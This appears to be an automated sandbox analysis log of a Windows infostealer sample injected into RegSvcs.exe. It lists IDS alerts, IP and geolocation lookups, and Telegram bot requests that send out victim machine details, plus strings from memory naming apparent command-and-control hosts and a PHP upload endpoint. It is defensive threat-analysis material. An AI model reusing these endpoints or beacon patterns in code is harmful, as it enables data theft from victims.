                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49757 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49767 -> 104.21.16.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49732 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49756 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F522EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00F522EE
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:39:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:00:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 22:44:22 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 22:44:38 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: RegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: RegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: RegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: RegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20a
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RegSvcs.exe, 00000008.00000002.4172080373.0000000003251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000317F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: RegSvcs.exe, 00000008.00000002.4172080373.0000000003251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enDze
                Source: RegSvcs.exe, 00000002.00000002.4172452396.0000000003291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enDzh
                Source: RegSvcs.exe, 00000002.00000002.4172452396.000000000328C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000324C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBdq
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.0000000003104000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.0000000003174000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.0000000003104000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 00000008.00000002.4172080373.0000000003134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: RegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.000000000312E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.0000000003174000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: RegSvcs.exe, 00000002.00000002.4172452396.00000000031BF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004396000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000428E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000042B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000040DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004240000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000424E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004356000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004275000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000409C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004200000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000317F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004497000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: RegSvcs.exe, 00000002.00000002.4175379546.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000421B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004371000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004246000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000448F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000041DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004207000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004332000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000444F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: RegSvcs.exe, 00000002.00000002.4172452396.00000000031BF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004396000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000428E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000042B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000040DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004240000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000424E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004356000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004275000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000409C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004200000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000317F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004497000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
